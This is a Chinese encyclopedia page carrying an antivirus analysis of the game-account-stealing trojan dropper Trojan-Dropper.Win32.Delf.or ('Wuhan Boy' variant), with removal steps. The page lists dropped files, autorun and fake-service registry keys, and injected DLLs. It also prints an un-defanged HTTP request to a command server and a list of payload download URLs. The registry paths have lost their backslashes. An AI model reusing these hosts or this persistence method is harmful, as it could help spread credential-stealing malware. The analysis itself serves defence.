欢迎您访问本站首页笑话数码汽车珠宝手机购车首饰美妆装修厨房科普编程导购空间导购百科知道词典繁体王朝搜索

当前位置: 王朝网络 >> 王朝百科 >> Trojan-Dropper.Win32.Delf.or

Trojan-Dropper.Win32.Delf.or

王朝百科·作者佚名 2010-02-19

宽屏版字体: 小|中|大|超大

病毒名称： Trojan-Dropper.Win32.Delf.or

中文名称：武汉男生变种

病毒类型：木马类

文件 MD5： DD26CCAD1848DE5663F0B8892EB4DAE5

公开范围：完全公开

危害等级：中等

文件长度： 75,269 字节

感染系统： Win98以上系统

开发工具： Borland Delphi 6.0 - 7.0

加壳类型:nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping [Overlay]

ASPack 2.x (without poly) -> Alexey Solodovnikov

命名对照：驱逐舰[BackDoor.Pegion.516]

瑞星[Worm.Nimaya.al]

病毒描述：

该病毒运行后，病毒衍生文件到系统目录下，连接某服务器获得要下载病毒的地址到本机运行。添加注册表自动运行项与服务项以随机引导病毒体。该病毒主要为盗取用户游戏账号为主。包括征途、传奇、QQ、热血江湖等。

行为分析：

1、衍生下列副本与文件

%Windir% tembay.exe

%Windir%ly.exe

%Windir%my.exe

%Windir%wanmei.exe

%Windir%wl.exe

%System32%1.exe

%System32%2.exe

%System32%Security.exe

%System32%iexpl0re.exe

%System32%userspi.dll

%System32%wdfmgr32.exe

%System32%windhcp.ocx

%System32%winlogin.exe

%System32%wsvbs.dll

%System32%wunk32.exe

%System32%dirvers usbme.sys

%System32%dirvers spoclsv.exe

%ProgramFiles% Desktop_.ini

2、新建注册表键值：

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

policiesExplorerRunwin 键值: 字符串: "%WINDIR%

system32wunk32.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

Run2ls1essru 键值: 字符串: "%WINDIR%iexpiore.exe"

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

Runwsvbs 键值: 字符串: "%WINDIR%wanmei.exe"

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion

Runsvcshare

键值: 字符串: "%WINDIR%system32driversspoclsv.exe"

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion

RunSymhMy

键值: 字符串: "%WINDIR%system32iexpl0re.exe"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesServerAC

Description

键值: 字符串: "给予本地帐户高级保护机制。"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesServerAC

DisplayName

键值: 字符串: "Server Advance"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesServerAC

ImagePath

键值: 类型: REG_EXPAND_SZ 长度: 33 (0x21) 字节

%WINDIR%system32Security.exe

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWinDHCPsvc

Description 键值: 字符串: "为远程计算机注册并更新 IP 地址。"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWinDHCPsvc

DisplayName 键值: 字符串: "Windows DHCP Service"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWinDHCPsvc

ImagePath 键值: 类型: REG_EXPAND_SZ 长度: 52 (0x34) 字节

%WINDIR%system32\rundll32.exe windhcp.ocx

3、连接某服务器地址获得要下载的病毒体地址：

www.krvkr.com(58.215.79.164)

www.whboy.net(58.215.79.64)

GET /update/wormcn.txt

User-Agent: QQ

Host: www.whboy.net

wormcn.txt内容：

http://www.krvkr.com/down/cq.exe

http://www.krvkr.com/down/ly.exe

http://www.krvkr.com/down/my.exe

http://www.krvkr.com/down/rx.exe

http://www.krvkr.com/down/wl.exe

http://www.krvkr.com/down/wow.exe

http://www.krvkr.com/down/zt.exe

http://www.krvkr.com/down/wanmei.exe

http://www.krvkr.com/down/dj.exe

http://www.krvkr.com/down/kr/itembay.exe

4、插入线程：

windhcp.ocx 到 explorer.exe进程

userspi.dll 到 explorer.exe进程

wsvbs.dll 到 explorer.exe进程

注：% System%是一个：可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:WinntSystem32，windows95/98/me中默认的安装路径是C:WindowsSystem，windowsXP中默认的安装路径是C:WindowsSystem32。

--------------------------------------------------------------------------------

清除方案：

1、使用安天木马防线可彻底清除此病毒(推荐)

2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。

(1) 使用安天木马防线“进程管理”关闭病毒进程

spoclsv.exe

iexpl0re.exe

(2) 使用安天木马防线禁用下列服务：

Server Advance

(3) 找到下列注册表键值：

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWinDHCPsvc

ImagePath： %WINDdirsystem32\rundll32.exe windhcp.ocx,start